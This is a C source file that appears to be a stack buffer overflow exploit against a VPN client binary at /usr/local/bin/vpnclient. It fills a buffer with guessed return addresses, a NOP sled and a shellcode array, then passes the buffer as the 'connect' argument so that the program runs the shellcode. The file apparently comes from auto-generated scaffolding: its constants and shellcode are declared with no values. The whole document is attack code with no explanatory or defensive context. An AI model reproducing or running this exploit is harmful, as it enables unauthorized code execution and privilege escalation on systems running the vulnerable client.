
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int LEN ;
 char NOP ;
 int atoi (char*) ;
 int bzero (char*,int) ;
 int execl (char*,char*,char*,char*,int ) ;
 int get_sp () ;
 scalar_t__ malloc (int) ;
 int printf (char*,long,int) ;
 int * shell ;
 int strlen (int *) ;

int main(int argc, char *argv[]) {

 int i, offset=0;
 long addr;
 char *buf, *ptr;

 if(argc > 1) offset = atoi(argv[1]);

 buf = (char *)malloc(sizeof(char) * LEN);
 bzero(buf, LEN);
 addr = get_sp() - offset;
 printf("addr: 0x%x, offset: %d\n", addr, offset);

 for(i = 0; i < LEN; i += 4) {
  *(long *)&buf[i] = addr;
 }

 for(i = 0; i < (LEN / 2); i++) {
  *(buf + i) = NOP;
 }

 ptr = buf + ((LEN / 2) - (strlen(shell) / 2));
 for(i = 0; i < strlen(shell); i++) {
  *(ptr++) = shell[i];
 }
 buf[LEN - 1] = '\0';

 execl("/usr/local/bin/vpnclient", "vpnclient", "connect", buf, 0);
 return(0);

}
